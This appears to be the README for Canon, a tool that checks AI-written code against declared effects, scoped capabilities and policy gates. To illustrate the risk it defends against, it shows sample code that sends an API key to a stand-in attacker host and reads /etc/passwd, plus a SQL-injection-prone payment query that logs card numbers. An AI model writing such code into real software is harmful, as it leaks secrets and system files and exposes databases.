
WarforgeTech/canon

Canon

AI-written, machine-verified, human-optional.

Canon is for teams building with AI agents who keep running into the same uncomfortable truth:

AI-generated code is fast — but it has ambient authority. One "helpful" change can silently add network calls, leak secrets to logs, or widen permissions… and you won't notice until prod (or worse).

Canon flips the model. Instead of trusting the AI's output, you make the AI write inside a machine-checkable contract:

  • Every side effect is explicit (network, DB, filesystem, logging)
  • Every side effect is capability-gated (scoped permissions, no ambient authority)
  • Policies block unsafe behavior before code is generated
  • Builds are deterministic and auditable (what changed, what authority expanded, what rules were violated)

In practice, Canon lets you run background agents with confidence — because they can refactor and extend systems, but they cannot expand what the system is allowed to do without tripping validation/policy gates.

New to Canon? Start with the Tutorial — you'll see real-world value in minutes by watching Canon block a "reasonable" AI mistake (like logging PII) before it ships.


The 10-second why

Traditional code: Code runs with ambient authority → review is your only guardrail.

Canon: IR validates effects + caps → policies approve → code is generated → tests run. If an agent tries to exceed permissions (wrong host, wrong DB collection, logging PII), the build fails.
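The gate ordering above is fail-fast: a failure at any stage stops the build before later stages run, so over-broad authority is rejected before any code exists. A minimal sketch of that control flow (illustrative only; stage names mirror the CLI output, not Canon's actual internals, which are written in Go):

```typescript
// Fail-fast pipeline gating: each stage must pass before the next runs.
// Hypothetical sketch -- not Canon's real implementation.
type Stage = { name: string; run: () => boolean };

function runPipeline(stages: Stage[]): string {
  for (const stage of stages) {
    if (!stage.run()) {
      return `Build: FAILED (${stage.name})`; // later stages never run
    }
  }
  return "Build: SUCCESS";
}
```

For example, a pipeline whose policy stage fails never reaches codegen or tests.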


Why Canon?

The Problem: AI Code Without Guardrails

When AI generates traditional code, you're trusting it blindly:

# AI generates this - what could go wrong?
import requests, os

def fetch_user_data(user_id):
    api_key = os.environ.get("API_KEY")  # Reads any env var
    response = requests.get(              # Can call ANY URL
        f"https://{user_id}.attacker.com/exfil",  # Data exfiltration!
        headers={"X-Key": api_key}
    )
    with open("/etc/passwd", "r") as f:   # Filesystem access!
        return f.read()

Problems with AI-generated traditional code:

  • No visibility into what the AI decided or why
  • Ambient authority - code can access anything
  • Side effects are implicit and invisible
  • No compile-time safety checks
  • No confidence scores or alternatives considered

The Solution: Canon's Verified AI Code

Canon makes every side effect explicit and capability-gated:

{
  "effects": {
    "http_get": {
      "name": "net.http",
      "inputs": [{"kind": "String"}],
      "output": {"kind": "HttpResponse"}
    }
  },
  "capabilities": {
    "cap_http": {
      "kind": "net.http",
      "scope": { "hosts": ["api.example.com"] },
      "revocable": true
    }
  }
}

What Canon guarantees:

  • Every side effect is declared and authorized
  • Capability scopes limit what code can touch
  • AI provenance tracks origin and confidence
  • Policy gates catch violations at compile time
  • Deterministic, reproducible builds
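Conceptually, a scoped capability like cap_http means the runtime can reject any request whose host falls outside the declared allowlist. A minimal enforcement sketch, using a hypothetical helper rather than Canon's actual runtime API:

```typescript
// Hypothetical sketch: check a capability's host scope before any
// request is issued. Not Canon's real runtime API.
type HttpCapability = {
  kind: "net.http";
  scope: { hosts: string[] };
  revocable: boolean;
};

function assertHostAllowed(cap: HttpCapability, capName: string, url: string): void {
  const host = new URL(url).hostname;
  if (!cap.scope.hosts.includes(host)) {
    throw new Error(
      `host '${host}' not allowed by capability '${capName}' (allowed: [${cap.scope.hosts.join(", ")}])`
    );
  }
}
```

With the capability above, a request to api.example.com passes, while a request to any other host fails before it leaves the process.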

Getting Started

Prerequisites

  • Go 1.22+ - For building the Canon CLI
  • Node.js 18+ - For running generated TypeScript
  • npm - For TypeScript dependencies

Installation

# Clone the repository
git clone https://github.com/WarforgeTech/canon.git
cd canon

# Build the CLI
make build

# Verify installation
./bin/canon --help

Your First Canon Program

1. Run the hello world example:

./bin/canon build examples/hello/hello.canon.json

Output:

Building: examples/hello/hello.canon.json

[1/4] Validating...
  Validation: PASSED

[2/4] Checking policies...
  Policy check: PASSED

[3/4] Generating code...
  Output: ./out
  Code generation: PASSED

[4/4] Running tests...
  Tests: PASSED (2/2)

Build: SUCCESS

2. See the generated TypeScript:

cat out/hello.ts
// Generated by Canon codegen - DO NOT EDIT
import { Host } from "../runtime-ts/effects";

export async function hello(host: Host, input: Record<string, unknown>): Promise<unknown> {
  const n_name = input["name"];
  const n_prefix = "Hello, ";
  const n_suffix = "!";
  const n_join1 = (n_prefix + n_name);
  const n_join2 = (n_join1 + n_suffix);
  return n_join2;
}

3. Try the HTTP service example with effects:

./bin/canon build examples/http-service/service.canon.json

4. See capability enforcement in action:

./bin/canon validate examples/policy-demo/violation.canon.json

Output:

Error: host 'malicious.com' not allowed by capability 'cap_http' (allowed: [api.example.com])

Real-World Example: Secure Payment Processing

This example shows why Canon matters for production AI code.

Traditional AI-Generated Code (Dangerous)

# AI generates payment code - scary!
def process_payment(user_id, amount):
    card = db.query(f"SELECT * FROM cards WHERE user={user_id}")  # SQL injection!
    stripe.charge(card.number, amount)  # Can charge any amount!
    log.info(f"Charged card {card.number}")  # Logs sensitive data!

Canon Payment Service (Secure by Construction)

{
  "effects": {
    "payment_charge": {
      "name": "payment.charge",
      "inputs": [{"kind": "PaymentRequest"}],
      "output": {"kind": "PaymentResult"}
    }
  },
  "capabilities": {
    "cap_payment": {
      "kind": "payment.charge",
      "scope": {
        "max_amount_cents": 10000,
        "currencies": ["USD"],
        "accounts": ["acct_prod_main"]
      },
      "revocable": true
    }
  },
  "policies": [
    { "id": "payment_safety", "path": "policies/payment.rego" }
  ]
}

With Canon:

  • Capability limits charges to $100 max
  • Only USD currency allowed
  • Bound to specific merchant account
  • Policy prevents logging card numbers
  • Full audit trail of AI decisions
  • Compile-time rejection of unsafe patterns
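The scope checks above reduce to simple comparisons against the declared capability. A sketch of how the cap_payment scope might be enforced (hypothetical helper; Canon's real checks run in its validation and policy stages):

```typescript
// Illustrative enforcement of the cap_payment scope from the IR above.
// Hypothetical helper -- not Canon's actual API.
type PaymentScope = {
  max_amount_cents: number;
  currencies: string[];
  accounts: string[];
};

function chargeViolation(
  scope: PaymentScope,
  amountCents: number,
  currency: string,
  account: string
): string | null {
  if (amountCents > scope.max_amount_cents) return "amount exceeds capability limit";
  if (!scope.currencies.includes(currency)) return "currency not in scope";
  if (!scope.accounts.includes(account)) return "account not in scope";
  return null; // charge is within the declared scope
}
```

A $50 USD charge against acct_prod_main passes; a $200 charge or a EUR charge is rejected before any payment effect runs.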

CLI Reference

# Validate schema, types, effects, and capabilities
canon validate <file.canon.json>

# Run OPA/Rego safety policies
canon policy <file.canon.json>

# Generate TypeScript code
canon gen <file.canon.json> --target ts --out ./out

# Run golden tests
canon test <file.canon.json>

# Full pipeline: validate -> policy -> gen -> test
canon build <file.canon.json>

Flags

Flag             Description
--verbose, -v    Show detailed output
--json           Output as JSON
--out, -o        Output directory (default: ./out)
--skip-tests     Skip test execution

How It Works

+------------------------------------------------------------------+
|                       Canon Pipeline                              |
+------------------------------------------------------------------+
|                                                                   |
|  .canon.json  -->  Validate  -->  Policy  -->  Codegen  -->  TS  |
|                       |            |              |               |
|                       v            v              v               |
|                    Types       OPA/Rego      TypeScript           |
|                    Effects     Safety        + Runtime            |
|                    Caps        Gates         + Tests              |
|                                                                   |
+------------------------------------------------------------------+

Validation Checks

  • JSON Schema validation
  • Type checking (params, returns, struct fields)
  • Effect/capability enforcement
  • DAG cycle detection
  • AI provenance validation
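DAG cycle detection is a standard graph check: a depth-first search that flags any node reached again while it is still on the traversal stack. A generic sketch (not Canon's actual implementation):

```typescript
// Three-color DFS over a node -> dependencies map. Revisiting a node
// that is still "visiting" means a back edge, i.e. a cycle.
function hasCycle(graph: Record<string, string[]>): boolean {
  const state = new Map<string, "visiting" | "done">();
  const visit = (node: string): boolean => {
    const s = state.get(node);
    if (s === "visiting") return true; // back edge found
    if (s === "done") return false;
    state.set(node, "visiting");
    for (const dep of graph[node] ?? []) {
      if (visit(dep)) return true;
    }
    state.set(node, "done");
    return false;
  };
  return Object.keys(graph).some((n) => visit(n));
}
```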

Policy Gates

  • Network domain allowlists
  • Filesystem write restrictions
  • Secret access controls
  • AI confidence thresholds
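A confidence-threshold gate, for instance, reduces to comparing the AI provenance metadata against a policy minimum. A minimal sketch with hypothetical field names (the ai/1.0 dialect's actual schema may differ):

```typescript
// Hypothetical provenance record; field names are illustrative,
// not the ai/1.0 dialect's actual schema.
type Provenance = { generator: string; confidence: number };

function confidenceGate(
  p: Provenance,
  minConfidence: number
): { pass: boolean; reason?: string } {
  if (p.confidence < minConfidence) {
    return { pass: false, reason: `confidence ${p.confidence} below threshold ${minConfidence}` };
  }
  return { pass: true };
}
```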

Examples

Example         Description
hello           Pure function, no effects
http-service    HTTP calls with capability scoping
enum-demo       Pattern matching on enum types
data-pipeline   List operations (map, filter, fold)
policy-demo     Demonstrates policy violations

Dialects

Canon uses a dialect system for extensibility:

Dialect         Purpose
core/1.0        Types, functions, control flow
effect/1.0      Effect declarations and checking
cap/1.0         Capability model and grants
resource/1.0    Databases, queues, secrets, endpoints
policy/1.0      Policy blocks (Rego evaluation)
test/1.0        Property tests and golden tests
ai/1.0          Provenance, confidence, alternatives

Documentation


License

MIT
